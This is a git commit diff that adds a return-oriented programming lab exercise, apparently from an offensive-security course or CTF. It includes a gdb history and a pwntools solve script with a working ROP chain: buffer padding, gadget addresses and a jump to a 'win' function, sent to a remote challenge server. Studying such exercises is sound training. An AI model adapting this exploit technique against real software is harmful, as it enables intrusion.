rop and lab3_4_recap

2026-05-20 12:45:03 +02:00
parent c9dbb784b4
commit fa309f3919
50 changed files with 1083 additions and 0 deletions
--- a/rop/03_chain_reactor/.gdb_history
+++ b/rop/03_chain_reactor/.gdb_history
@@ -0,0 +1,8 @@
+disass main
+disass vuln
+disass main
+b *0x000000000040132a
+r
+c
+disass win
+quit
--- a/rop/03_chain_reactor/chain_reactor
+++ b/rop/03_chain_reactor/chain_reactor
--- a/rop/03_chain_reactor/solve.py
+++ b/rop/03_chain_reactor/solve.py
@@ -0,0 +1,24 @@
+from pwn import *
+
+OFF = 64
+pop_rdi = 0x000000000040121F
+pop_rsi = 0x0000000000401221
+ret = 0x000000000040101A
+var1 = 0xC0FFEE
+var2 = 0xBADC0DE
+win = 0x0000000000401226
+context.binary = elf = ELF("./chain_reactor", checksec=False)
+# p = process(elf.path)
+p = remote("offsec.m0lecon.it", 13510)
+print(p.recvuntil(b"[chain-reactor] Enter activation codes: "))
+payload = flat(
+    b"A" * 64,
+    p64(ret),
+    p64(pop_rdi),
+    p64(var1),
+    p64(pop_rsi),
+    p64(var2),
+    p64(win),
+)
+p.sendline(payload)
+p.interactive()